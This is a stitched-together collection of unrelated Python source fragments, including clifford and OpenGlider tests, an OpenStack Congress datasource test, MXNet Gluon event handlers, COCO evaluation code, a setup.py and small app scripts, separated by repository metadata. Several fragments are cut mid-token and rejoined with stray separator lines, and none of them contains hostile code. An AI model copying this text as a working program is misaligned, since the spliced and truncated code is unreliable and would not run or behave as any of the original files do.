for N in [2, 3, 4]:
l, b = Cl(N)
X = np.random.rand((N**2)).reshape(N, N)
I = l.pseudoScalar
B, I = tools.mat2Frame(X, I=I)
X_, I = tools.frame2Mat(B=B, I=I)
testing.assert_almost_equal(X, X_)
class TestG3Tools:
def test_quaternion_conversions(self, rng): # noqa: F811
"""
Bidirectional rotor - quaternion test. This needs work but is a reasonable start
"""
from clifford.tools.g3 import rotor_to_quaternion, quaternion_to_rotor
from clifford.tools.g3c import random_rotation_rotor
for i in range(1000):
rotor = random_rotation_rotor(rng=rng)
quaternion = rotor_to_quaternion(rotor)
rotor_return = quaternion_to_rotor(quaternion)
testing.assert_almost_equal(rotor.value, rotor_return.value)
@too_slow_without_jit
def test_rotation_matrix_conversions(self, rng): # noqa: F811
"""
Bidirectional rotor - rotation matrix test. This needs work but is a reasonable start
"""
from clifford.g3c import down
from clifford.tools.g3 import rotation_matrix_to_rotor, rotor_to_rotation_matrix
from clifford.tools.g3c import random_rotation_rotor, random_conformal_point, apply_rotor
for i in range(1000):
rotor = random_rotation_rotor(rng=rng)
# Check that we can map up and back
Rmat = rotor_to_rotation_matrix(rotor)
rotor_return = rotation_matrix_to_rotor(Rmat)
# Check that the rotations do the same thing
for k in range(10):
A = random_conformal_point(rng=rng)
B = down(apply_rotor(A, rotor)).value[1:4]
C = Rmat @ down(A).value[1:4]
np.testing.assert_almost_equal(B, C)
C = down(apply_rotor(A, rotor_return)).value[1:4]
np.testing.assert_almost_equal(B, C)
def test_generate_rotation_rotor_and_angle(self, rng): # noqa: F811
"""
Checks rotation rotor generation
"""
from clifford.tools.g3 import generate_rotation_rotor, random_unit_vector, angle_between_vectors
for i in range(1000):
euc_vector_m = random_unit_vector(rng=rng)
euc_vector_n = random_unit_vector(rng=rng)
theta = angle_between_vectors(euc_vector_m, euc_vector_n)
rot_rotor = generate_rotation_rotor(theta, euc_vector_m, euc_vector_n)
v1 = euc_vector_m
v2 = rot_rotor*euc_vector_m*~rot_rotor
theta_return = angle_between_vectors(v1, v2)
testing.assert_almost_equal(theta_return, theta)
testing.assert_almost_equal(euc_vector_n.value, v2.value)
@pytest.mark.skip(reason="unknown")
def test_find_rotor_aligning_vectors(self, rng): # noqa: F811
"""
Currently fails, needs to be dug into
"""
from clifford.g3c import layout
e1 = layout.blades['e1']
e2 = layout.blades['e2']
from clifford.tools.g3 import random_euc_mv, random_rotation_rotor, rotor_align_vecs
u_list = [random_euc_mv(rng=rng) for i in range(50)]
for i in range(100):
r = random_rotation_rotor(rng=rng)
v_list = [r*u*~r for u in u_list]
r_2 = rotor_align_vecs(u_list, v_list)
print(r_2)
print(r)
testing.assert_almost_equal(r.value, r_2.value)
class TestPointProcessing:
def test_convex_hull_vertices(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
conf_vertices = [hull.GApoints[i] for i in hull.vertices]
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(conf_vertices, static=True, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_conformal_rounds(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
rounds = hull.conformal_rounds()
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(rounds, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_conformal_flats(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
flats = hull.conformal_flats()
# from pyganja import GanjaScene, draw
# gs = Ganj
|
aScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(flats, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_facets(self, rng): # noqa: F811
from clifford.too
|
ls.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
facets = hull.conformal_facets()
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# for f in facets:
# gs.add_facet(f, color=int('AAFF0000', 16))
# draw(gs, scale=0.05)
def test_GADelaunay_facets(self, rng): # noqa: F811
from clifford.g3c import up, blades, layout
e1 = blades['e1']
e2 = blades['e2']
einf = layout.einf
from clifford.tools.g3c import random_conformal_point, project_points_to_plane
from clifford.tools.point_processing import GADelaunay
point_list = [random_conformal_point(rng=rng) for i in range(100)]
point_list_flat = project_points_to_plane(point_list, (up(0)^up(e1)^up(e2)^einf).normal())
hull = GADelaunay(point_list_flat, hull_dims=2)
facets = hull.conformal_facets()
# from pyg
|
ramineni/my_congress
|
congress/tests/dse2/test_datasource.py
|
Python
|
apache-2.0
| 8,631
| 0
|
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import mock
from oslo_config import cfg
from oslo_db import exception as db_exc
from congress.db import datasources as datasource_db
from congress.dse2 import dse_node
from congress import exception as congressException
from congress.tests.api import base as api_base
from congress.tests import base
from congress.tests import fake_datasource
class TestDataSource(base.SqlTestCase):
def setUp(self):
super(TestDataSource, self).setUp()
config = api_base.setup_config(with_fake_datasource=False, api=False,
policy=False)
self.dseNode = config['node']
self.ds_manager = config['ds_manager']
def _get_datasource_request(self):
# leave ID out--generated during creation
return {'name': 'aaron',
'driver': 'fake_datasource',
'description': 'hello world!',
'enabled': True,
'type': None,
'config': {'auth_url': 'foo',
'username': 'armax',
'password': 'password',
'tenant_name': 'armax'}}
def test_add_datasource(self):
req = self._get_datasource_request()
result = self.ds_manager.add_datasource(req)
# test equality of return value except for 'id' field
del(result['id'])
self.assertEqual(req, result)
# check that service actually on dseNode
services = self.dseNode.get_services()
self.assertEqual(len(services), 1)
self.assertEqual(services[0].service_id, req['name'])
self.assertIsInstance(services[0],
fake_datasource.FakeDataSource)
obj = self.dseNode.invoke_service_rpc(
req['name'], 'get_status', {'source_id': None, 'params': None})
self.assertIsNotNone(obj)
@mock.patch.object(datasource_db, 'add_datasource')
def test_add_datasource_db_error(self, add_ds):
add_ds.side_effect = db_exc.DBError('Error in db.')
req = self._get_datasource_request()
self.assertRaises(congressException.DatasourceCreationError,
self.ds_manager.add_datasource, req)
@mock.patch.object(dse_node.DseNode, 'register_service')
def test_add_datasource_synchronizer_error(self, register_ds):
register_ds.side_effect = Exception('Error in registering service')
req = self._get_datasource_request()
self.assertRaises(congressException.DatasourceCreationError,
self.ds_manager.add_datasource, req)
ds = datasource_db.get_datasource_by_name(req['name'])
self.assertIsNone(ds)
def test_get_datasource(self):
req = self._get_datasource_request()
ds = self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasource(ds['id'])
# test equality except for 'id' field
del(result['id'])
self.assertEqual(req, result)
def test_get_datasources(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasources()
self.assertEqual(len(result), 1)
result = result[0]
# test equality except for 'id' field
del(result['id'])
self.assertEqual(req, result)
def test_get_datasources2(self):
req1 = self._get_datasource_request()
req1['name'] = 'datasource1'
result1 = self.ds_manager.add_datasource(req1)
req2 = self._get_datasource_request()
req2['name'] = 'datasource2'
result2 = self.ds_manager.add_datasource(req2)
# check results of add_datasource
for key, value in req1.items():
self.assertEqual(value, result1[key])
for key, value in req2.items():
self.assertEqual(value, result2[key])
# check services actually on dseNode
services = self.dseNode.get_services()
self.assertEqual(len(services), 2)
self.assertEqual(set([s.service_id for s in services]),
set(['datasource1', 'datasource2']))
self.assertIsInstance(services[0],
fake_datasource.FakeDataSource)
self.assertIsInstance(services[1],
fake_datasource.FakeDataSource)
# check results of get_datasources
resultall = self.dseNode.get_datasources()
self.assertEqual(len(resultall), 2)
# check equality except for 'id' field
byname = {x['name']: x for x in resultall}
for x in byname.values():
del(x['id'])
self.assertEqual(byname, {'datasource1': req1, 'datasource2': req2})
def test_get_datasources_hide_secret(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasources(filter_secret=True)
result = result[0]
# check equality except that 'config'/'password' is hidden
req['co
|
nfig']['password'] = "<hidden>"
del(result['id'])
self.assertEqual(result, req)
def test_create_datasource_duplicate_name(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
self.assertRaises(congressException.DatasourceNameInUse,
self.ds_manager.add_datasource, req)
def tes
|
t_delete_datasource(self):
req = self._get_datasource_request()
result = self.ds_manager.add_datasource(req)
self.ds_manager.delete_datasource(result)
# check that service is actually deleted
services = self.dseNode.get_services()
self.assertEqual(len(services), 0)
self.assertRaises(
congressException.NotFound, self.dseNode.invoke_service_rpc,
req['name'], 'get_status', {'source_id': None, 'params': None})
# TODO(thinrichs): test that we've actually removed
# the row from the DB
# TODO(dse2): this test relies on coordination between dseNode and
# policy engine. Much harder in distributed system. Need to decide
# if we want that kind of invariant and if so implement it.
# def test_delete_datasource_error(self):
# req = self._get_datasource_request()
# req['driver'] = 'fake_datasource'
# req['config'] = {'auth_url': 'foo',
# 'username': 'armax',
# 'password': 'password',
# 'tenant_name': 'armax'}
# # let driver generate this for us.
# del req['id']
# result = self.datasource_mgr.add_datasource(req)
# engine = self.dseNode.service_object('engine')
# engine.create_policy('alice')
# engine.insert('p(x) :- %s:q(x)' % req['name'], 'alice')
# self.assertRaises(exception.DanglingReference,
# self.datasource_mgr.delete_datasource,
# result['id'])
def test_delete_invalid_datasource(self):
req = self._get_datasource_request()
req['id'] = 'fake-id'
self.assertRaises(congressException.DatasourceNotFound,
self.ds_manager.delete_datasource, req)
# TODO(dse2): Doesn't seem like we need this (or it will be moved to API).
# def test_get_driver_schema(self):
# schema = self.datasource_mgr.get_driver_schema(
# 'fake_datasource')
# self.assertEqual(
|
leezu/mxnet
|
python/mxnet/gluon/contrib/estimator/event_handler.py
|
Python
|
apache-2.0
| 33,227
| 0.002889
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-argument, too-many-ancestors
"""Gluon EventHandlers for Estimators"""
import os
import time
import warnings
import numpy as np
from ...metric import CompositeEvalMetric, EvalMetric
from ...metric import Loss as metric_loss
from .utils import _check_metrics
__all__ = ['TrainBegin', 'TrainEnd', 'EpochBegin', 'EpochEnd', 'BatchBegin', 'BatchEnd',
'StoppingHandler', 'MetricHandler', 'ValidationHandler',
'LoggingHandler', 'CheckpointHandler', 'EarlyStoppingHandler', 'GradientUpdateHandler']
class EventHandler(object):
pass
def _check_event_handlers(handlers):
if isinstance(handlers, EventHandler):
handlers = [handlers]
else:
handlers = handlers or []
if not all([isinstance(handler, EventHandler) for handler in handlers]):
raise ValueError("handlers must be an EventHandler or a list of EventHandler, "
"got: {}".format(handlers))
return handlers
class TrainBegin(EventHandler):
def train_begin(self, estimator, *args, **kwargs):
pass
class TrainEnd(EventHandler):
def train_end(self, estimator, *args, **kwargs):
pass
class EpochBegin(EventHandler):
def epoch_begin(self, estimator, *args, **kwargs):
pass
class EpochEnd(EventHandler):
def epoch_end(self, estimator, *args, **kwargs):
return False
class BatchBegin(EventHandler):
def batch_begin(self, estimator, *args, **kwargs):
pass
class BatchEnd(EventHandler):
def batch_end(self, estimator, *args, **kwargs):
return False
class StoppingHandler(TrainBegin, BatchEnd, EpochEnd):
"""Stop conditions to stop training
    Stop training once the maximum number of batches or epochs is
    reached.
Parameters
----------
max_epoch : int, default None
Number of maximum epochs to train.
max_batch : int, default None
Number of maximum batches to train.
"""
def __init__(self, max_epoch=None, max_batch=None):
self.max_epoch = max_epoch
self.max_batch = max_batch
self.current_batch = 0
self.current_epoch = 0
self.stop_training = False
def train_begin(self, estimator, *args, **kwargs):
self.max_epoch = estimator.max_epoch
self.max_batch = estimator.max_batch
self.current_batch = 0
self.current_epoch = 0
|
def batch_end(self, estimator, *args, **kwargs):
self.current_batch += 1
if self.current_batch == self.max_batch:
self.stop_training = True
|
return self.stop_training
def epoch_end(self, estimator, *args, **kwargs):
self.current_epoch += 1
if self.current_epoch == self.max_epoch:
self.stop_training = True
return self.stop_training
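# Illustrative usage sketch (not part of the original module): custom handlers are
# attached through an estimator's fit() call, e.g.
#   est.fit(train_data, epochs=5, event_handlers=[my_handler])
# where `est` is assumed to be a gluon.contrib.estimator.Estimator and `my_handler`
# an instance of one of the EventHandler subclasses defined in this module.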
class MetricHandler(EpochBegin, BatchEnd):
"""Metric Handler that update metric values at batch end
    :py:class:`MetricHandler` takes model predictions and true labels
    and updates the metrics; it also updates the metric wrapper for loss with loss values.
    Validation loss and metrics will be handled by :py:class:`ValidationHandler`
Parameters
----------
metrics : List of EvalMetrics
Metrics to be updated at batch end.
priority : scalar
        Priority level of the MetricHandler. Priority levels are sorted in ascending
        order: the lower the number, the higher the priority of the handler.
"""
def __init__(self, metrics, priority=-1000):
self.metrics = _check_metrics(metrics)
# order to be called among all callbacks
# metrics need to be calculated before other callbacks can access them
self.priority = priority
def epoch_begin(self, estimator, *args, **kwargs):
for metric in self.metrics:
metric.reset()
def batch_end(self, estimator, *args, **kwargs):
pred = kwargs['pred']
label = kwargs['label']
loss = kwargs['loss']
for metric in self.metrics:
if isinstance(metric, metric_loss):
# metric wrapper for loss values
metric.update(0, loss)
else:
metric.update(label, pred)
class ValidationHandler(TrainBegin, BatchEnd, EpochEnd):
"""Validation Handler that evaluate model on validation dataset
:py:class:`ValidationHandler` takes validation dataset, an evaluation function,
    metrics to be evaluated, and how often to run the validation. You can provide a custom
    evaluation function or use the one provided by :py:class:`Estimator`
Parameters
----------
val_data : DataLoader
Validation data set to run evaluation.
eval_fn : function
A function defines how to run evaluation and
calculate loss and metrics.
epoch_period : int, default 1
How often to run validation at epoch end, by default
:py:class:`ValidationHandler` validate every epoch.
batch_period : int, default None
How often to run validation at batch end, by default
:py:class:`ValidationHandler` does not validate at batch end.
priority: scalar, default -1000
        Priority level of the ValidationHandler. Priority levels are sorted in
        ascending order: the lower the number, the higher the priority of the
        handler.
event_handlers : EventHandler or list of EventHandlers
        List of :py:class:`EventHandler` to apply during validation. This argument
        is used by the self.eval_fn function in order to process customized event
        handlers.
"""
def __init__(self,
val_data,
eval_fn,
epoch_period=1,
batch_period=None,
priority=-1000,
event_handlers=None):
self.val_data = val_data
self.eval_fn = eval_fn
self.epoch_period = epoch_period
self.batch_period = batch_period
self.current_batch = 0
self.current_epoch = 0
# order to be called among all callbacks
# validation metrics need to be calculated before other callbacks can access them
self.priority = priority
self.event_handlers = event_handlers
def train_begin(self, estimator, *args, **kwargs):
# reset epoch and batch counter
self.current_batch = 0
self.current_epoch = 0
def batch_end(self, estimator, *args, **kwargs):
self.current_batch += 1
if self.batch_period and self.current_batch % self.batch_period == 0:
self.eval_fn(val_data=self.val_data, batch_axis=estimator.batch_axis,
event_handlers=self.event_handlers)
def epoch_end(self, estimator, *args, **kwargs):
self.current_epoch += 1
if self.epoch_period and self.current_epoch % self.epoch_period == 0:
self.eval_fn(val_data=self.val_data, batch_axis=estimator.batch_axis,
event_handlers=self.event_handlers)
class LoggingHandler(TrainBegin, TrainEnd, EpochBegin, EpochEnd, BatchBegin, BatchEnd):
"""Basic Logging Handler that applies to every Gluon estimator by default.
:py:class:`LoggingHandler` logs hyper-parameters, training statistics,
and other useful information during training
Parameters
----------
log_interval: int or str, defau
|
mrrodd/Samples
|
DLR-IronPython/IronPython.UI/Scripts/SampleScript02.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
import clr
clr.AddReference("mscorlib")
clr.AddReference("PresentationFramework")
from System.Windows import Application
from System.IO import StreamReader
from System.Threading import Thread
from System.Windows.Markup import XamlReader
from System.Reflection import Assembly
from System import Action
class ViewModel:
numberOfSpeakers = 0
def __init__(self, speakers):
self.numberOfSpeakers = speakers
def getNumberOfSpeakers():
vm = ViewModel(Application.Current.MainWindow.DataContext.Speakers.Length)
stream = Application.Current.GetType().Assembly.GetManifestResourceStream(
"IronPython.UI.Scripts.ResultWindow.xaml")
reader = StreamReader(stream)
window = XamlReader.Parse(reader.ReadToEnd())
reader.Close()
stream.Close()
window.D
|
ataContext = vm
window.FindName("CloseButton").Click += lambda s, e: window.Close()
window.Show()
Application.Current.Dispatcher.BeginInvoke(Action(lambda: getNumberOfSpeakers()))
for i in range(0, 10):
print str(i+1)
|
Thread.Sleep(500)
print "Done!"
|
adlermedrado/abbr
|
setup.py
|
Python
|
apache-2.0
| 1,346
| 0
|
# Copyright 2016 Adler Brediks Medrado
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing p
|
ermissions and
# limitations under the License.
from setuptools import setup, find_packages
with open("requirements.txt") as reqs:
install_requires = reqs.readlines()
setup(
name="abbr",
version="0.0.1"
|
,
url="https://github.com/adlermedrado/abbr",
author="Adler Brediks Medrado",
author_email="abbr@adlermedrado.com.br",
license="Apache-2.0",
description="A client library to abbreviate string contents",
long_description=open('README.rst').read(),
packages=find_packages(),
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
)
|
rishita/mxnet
|
example/rcnn/rcnn/pycocotools/cocoeval.py
|
Python
|
apache-2.0
| 19,780
| 0.009757
|
__author__ = 'tsungyi'
from __future__ import print_function
import numpy as np
import datetim
|
e
import time
from collections import defaultdict
import mask
import copy
class COCOe
|
val:
# Interface for evaluating detection on the Microsoft COCO dataset.
#
# The usage for CocoEval is as follows:
# cocoGt=..., cocoDt=... # load dataset and results
# E = CocoEval(cocoGt,cocoDt); # initialize CocoEval object
# E.params.recThrs = ...; # set parameters as desired
# E.evaluate(); # run per image evaluation
# E.accumulate(); # accumulate per image results
# E.summarize(); # display summary metrics of results
# For example usage see evalDemo.m and http://mscoco.org/.
#
# The evaluation parameters are as follows (defaults in brackets):
# imgIds - [all] N img ids to use for evaluation
# catIds - [all] K cat ids to use for evaluation
# iouThrs - [.5:.05:.95] T=10 IoU thresholds for evaluation
# recThrs - [0:.01:1] R=101 recall thresholds for evaluation
# areaRng - [...] A=4 object area ranges for evaluation
# maxDets - [1 10 100] M=3 thresholds on max detections per image
# useSegm - [1] if true evaluate against ground-truth segments
    #  useCats    - [1] if true use category labels for evaluation
    # Note: if useSegm=0 the evaluation is run on bounding boxes.
# Note: if useCats=0 category labels are ignored as in proposal scoring.
# Note: multiple areaRngs [Ax2] and maxDets [Mx1] can be specified.
#
# evaluate(): evaluates detections on every image and every category and
# concats the results into the "evalImgs" with fields:
# dtIds - [1xD] id for each of the D detections (dt)
# gtIds - [1xG] id for each of the G ground truths (gt)
# dtMatches - [TxD] matching gt id at each IoU or 0
# gtMatches - [TxG] matching dt id at each IoU or 0
# dtScores - [1xD] confidence of each dt
# gtIgnore - [1xG] ignore flag for each gt
# dtIgnore - [TxD] ignore flag for each dt at each IoU
#
# accumulate(): accumulates the per-image, per-category evaluation
# results in "evalImgs" into the dictionary "eval" with fields:
# params - parameters used for evaluation
# date - date evaluation was performed
# counts - [T,R,K,A,M] parameter dimensions (see above)
# precision - [TxRxKxAxM] precision for every evaluation setting
# recall - [TxKxAxM] max recall for every evaluation setting
# Note: precision and recall==-1 for settings with no gt objects.
#
# See also coco, mask, pycocoDemo, pycocoEvalDemo
#
# Microsoft COCO Toolbox. version 2.0
# Data, paper, and tutorials available at: http://mscoco.org/
# Code written by Piotr Dollar and Tsung-Yi Lin, 2015.
# Licensed under the Simplified BSD License [see coco/license.txt]
def __init__(self, cocoGt=None, cocoDt=None):
'''
Initialize CocoEval using coco APIs for gt and dt
:param cocoGt: coco object with ground truth annotations
:param cocoDt: coco object with detection results
:return: None
'''
self.cocoGt = cocoGt # ground truth COCO API
self.cocoDt = cocoDt # detections COCO API
self.params = {} # evaluation parameters
self.evalImgs = defaultdict(list) # per-image per-category evaluation results [KxAxI] elements
self.eval = {} # accumulated evaluation results
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
self.params = Params() # parameters
self._paramsEval = {} # parameters for evaluation
self.stats = [] # result summarization
self.ious = {} # ious between all gts and dts
if not cocoGt is None:
self.params.imgIds = sorted(cocoGt.getImgIds())
self.params.catIds = sorted(cocoGt.getCatIds())
def _prepare(self):
'''
Prepare ._gts and ._dts for evaluation based on params
:return: None
'''
#
def _toMask(objs, coco):
# modify segmentation by reference
for obj in objs:
t = coco.imgs[obj['image_id']]
if type(obj['segmentation']) == list:
if type(obj['segmentation'][0]) == dict:
print('debug')
obj['segmentation'] = mask.frPyObjects(obj['segmentation'],t['height'],t['width'])
if len(obj['segmentation']) == 1:
obj['segmentation'] = obj['segmentation'][0]
else:
# an object can have multiple polygon regions
# merge them into one RLE mask
obj['segmentation'] = mask.merge(obj['segmentation'])
elif type(obj['segmentation']) == dict and type(obj['segmentation']['counts']) == list:
obj['segmentation'] = mask.frPyObjects([obj['segmentation']],t['height'],t['width'])[0]
elif type(obj['segmentation']) == dict and \
                    (type(obj['segmentation']['counts']) == unicode or type(obj['segmentation']['counts']) == str):
pass
else:
raise Exception('segmentation format not supported.')
p = self.params
if p.useCats:
gts=self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
dts=self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
else:
gts=self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds))
dts=self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds))
if p.useSegm:
_toMask(gts, self.cocoGt)
_toMask(dts, self.cocoDt)
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
for gt in gts:
self._gts[gt['image_id'], gt['category_id']].append(gt)
for dt in dts:
self._dts[dt['image_id'], dt['category_id']].append(dt)
self.evalImgs = defaultdict(list) # per-image per-category evaluation results
self.eval = {} # accumulated evaluation results
def evaluate(self):
'''
Run per image evaluation on given images and store results (a list of dict) in self.evalImgs
:return: None
'''
tic = time.time()
print('Running per image evaluation... ')
p = self.params
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params=p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
computeIoU = self.computeIoU
self.ious = {(imgId, catId): computeIoU(imgId, catId) \
for imgId in p.imgIds
for catId in catIds}
evaluateImg = self.evaluateImg
maxDet = p.maxDets[-1]
self.evalImgs = [evaluateImg(imgId, catId, areaRng, maxDet)
for catId in catIds
for areaRng in p.areaRng
for imgId in p.imgIds
]
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
print('DONE (t=%0.2fs).'%(toc-tic))
def computeIoU(self, imgId, catId):
p = self.params
if p.useCats:
gt = self._gts[imgId,catId]
dt = self._dts[imgId,catId]
else:
gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]
dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]
if len(gt) == 0 and len(dt) ==0:
return []
dt = sorted(dt, key=lambda x: -x['s
|
hiaselhans/OpenGlider
|
tests/visual_test_flatten_glider.py
|
Python
|
gpl-3.0
| 4,457
| 0.004487
|
#! /usr/bin/python2
# -*- coding: utf-8; -*-
#
# (c) 2013 booya (http://booya.at)
#
# This file is part of the OpenGlider project.
#
# OpenGlider is free software; you can
|
redistribute it and/or mo
|
dify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# OpenGlider is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenGlider. If not, see <http://www.gnu.org/licenses/>.
import os
import random
import sys
import unittest
from openglider.plots.glider.cell import flattened_cell
try:
import openglider
except ImportError:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import openglider
import openglider.graphics
import openglider.plots
from test_glider import GliderTestClass
testfolder = os.path.dirname(os.path.abspath(__file__))
importpath = testfolder+"/demokite.ods"
class TestGlider_Flatten(GliderTestClass):
def setUp(self, complete=False):
super(TestGlider_Flatten, self).setUp(complete=complete)
def get_flattened_cell(self, allowance=0.02):
cell = self.glider.cells[random.randint(0, len(self.glider.cells)-1)]
left_bal, left, right, right_bal = flattened_cell(cell)
left_out = left.copy()
right_out = right.copy()
left_out.add_stuff(-allowance)
right_out.add_stuff(allowance)
return left_out, left, right, right_out
def showcut(self, num):
""""""
left_out, left, right, right_out = self.get_flattened_cell()
cuts_front = [random.random()*len(left)*0.1 for __ in range(2)]
cuts_back = [(random.random()+1)*len(left)*0.2 for __ in range(2)]
outlist_1, leftcut, rightcut = openglider.plots.cuts[num]([[left, cuts_front[0]], [right, cuts_front[1]]],
left_out, right_out, -0.02)
outlist_2, leftcut_2, rightcut_2 = openglider.plots.cuts[num]([[left, cuts_back[0]], [right, cuts_back[1]]],
left_out, right_out, 0.02)
cuts = [left_out[leftcut:leftcut_2], outlist_1, right_out[rightcut:rightcut_2], outlist_2]
marks = [left[cuts_front[0]:cuts_back[0]], right[cuts_front[1]:cuts_back[1]]]
openglider.graphics.Graphics2D([openglider.graphics.Line(thalist) for thalist in cuts] +
[openglider.graphics.Point(thalist) for thalist in marks])
def test_cut1(self):
self.showcut(0)
def test_cut2(self):
self.showcut(1)
def test_cut3(self):
self.showcut(2)
def test_mirror(self):
left_out, left, right, right_out = self.get_flattened_cell()
mirrored_left = left_out.copy()
mirrored_right = right_out.copy()
p1 = mirrored_left.data[-1].copy()
p2 = mirrored_right.data[-1].copy()
#print(mirrored_left.data[-1])
mirrored_left.mirror(p1, p2)
mirrored_right.mirror(p1, p2)
openglider.graphics.Graphics2D([openglider.graphics.Line(left_out.data),
openglider.graphics.Line(right_out.data),
openglider.graphics.Green,
openglider.graphics.Line(mirrored_left.data),
openglider.graphics.Line(mirrored_right.data)
])
def test_flattened_glider(self):
parts = openglider.plots.flatten_glider(self.glider)
all = parts['panels']
all.join(parts['ribs'])
layers = {}
for part in all.parts:
for name, layer in part.layers.iteritems():
layers.setdefault(name, [])
layers[name] += layer
openglider.graphics.Graphics3D([openglider.graphics.Line(l) for l in layers['OUTER_CUTS']] +
[openglider.graphics.Red] +
[openglider.graphics.Line(l) for l in layers['SEWING_MARKS']])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
Benxxen/pythonwetter
|
pythonwetter/serializers.py
|
Python
|
mit
| 385
| 0.007792
|
__author__ = 'McDaemon'
from models import Weather
from rest_framework import serializers
cla
|
ss WeatherSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Weather
        fields = ('datum', 'stadt', 'anbieter', 'wetter', 'tagestemperatur', 'einheit', 'kondition',
|
'windgeschwindigkeit', 'windrichtung', 'url')
|
klen/muffin-example
|
example/manage.py
|
Python
|
mit
| 817
| 0.001224
|
"""Setup the application's CLI commands."""
from example import app, db
@app.manage
def hello(name, upper=False):
"""Write command help text here.
:param name: W
|
rite your name
:param upper: Use uppercase
"""
greetings = f"Hello {name}!"
if upper:
greetings = greetings.upper()
print(greetings)
@app.manage
async def example_users():
"""Create users for the example."""
from example.models import User
async with
|
db.connection():
await User.get_or_create(email='user@muffin.io', defaults={
'username': 'user', 'password': User.generate_password('pass'),
})
await User.get_or_create(email='admin@muffin.io', defaults={
'username': 'admin', 'password': User.generate_password('pass'), 'is_super': True,
})
|
Onirik79/aaritmud
|
src/socials/social_eyebrow.py
|
Python
|
gpl-2.0
| 98
| 0.010204
|
# -*-
|
coding: utf-8
|
-*-
def social_eyebrow(entity, argument):
return True
#- Fine Funzione -
|
RNAcentral/rnacentral-import-pipeline
|
rnacentral_pipeline/cli/cpat.py
|
Python
|
apache-2.0
| 1,587
| 0
|
# -*- coding: utf-8 -*-
"""
Copyright [2009-2021] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
